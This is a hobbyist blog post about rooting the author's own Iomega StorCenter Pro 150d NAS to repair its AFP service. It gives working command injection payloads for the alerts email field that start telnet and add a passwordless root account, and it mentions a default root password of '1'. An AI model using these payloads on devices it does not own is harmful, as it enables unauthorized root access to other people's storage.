The StorCenter Pro 150d is a circa 2007 network-attached storage device (NAS) from Iomega which, frustratingly, does not provide shell access.
I had a problem with AFP (Apple Filing Protocol) not working but managed to get root access to fix it (turned out to be an orphaned pid file which wasn't being removed on boot, and which was preventing the service from starting).
The 150d has a vulnerability in how it handles email addresses within the alerts interface:
|
Screenshot of the StorCenter Pro 150d's Alerts Interface |
You can append any arbitrary command between backticks and it will be dutifully executed as root when you click the "Send Test Mail" button.
It turns out that the StorCenter Pro 150d has a telnet daemon available through inetd. So all we need to do is start that, add a passwordless root account, and we can pop right in.,
Here are the commands that worked for me, but
use them at your own risk. Click "Send Test Mail" after entering each one. The null@[192.168.0.18] address is arbitrary -- any email address should work there.
UPDATE: See the comment from @
George Kopf below. Apparently the default root password is simply the number '1', so you probably don't need to create the additional account. Just start the telnet daemon and try logging in as user 'root' with password '1'.
null@[192.168.0.18]`mount -t devpts devpts /dev/pts >> /nethdd/public/hacknas.log 2>&1 &`
null@[192.168.0.18]`nohup /bin/inetd /etc/inetd.conf >> /nethdd/public/hacknas.log 2>&1 &`
null@[192.168.0.18]`echo 'root2::0:0:administrator:/mnt/0:/bin/sh' >>/etc/passwd`
If you have the /public share of your NAS mounted somewhere, you can watch the hacknas.log file to see any error messages.
Once done, you should be able to telnet in:
$ telnet nas
Trying 192.168.0.20...
Connected to 192.168.0.20.
Escape character is '^]'.
Linux 2.6.13 (obi) (pts/0)
nas login: root2
BusyBox v1.00 (BUILDTIME) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
-sh: can't access tty; job control turned off
~ #
System info:
# cat /proc/cpuinfo
processor : 0
cpu : e300
revision : 1.1 (pvr 8083 0011)
bogomips : 263.16
chipset : 8347E
Vendor : Freescale Inc.
Machine : mpc8347E sys
core clock : 396 MHz
bus clock : 264 MHz
PVR : 0x80830011
SVR : 0x80520011
PLL setting : 0x6
Memory : 256 MB
Thanks to Jim Buzbee for
identifying the alert vulnerability, and asysadm for
his post on modifying the NFS export options.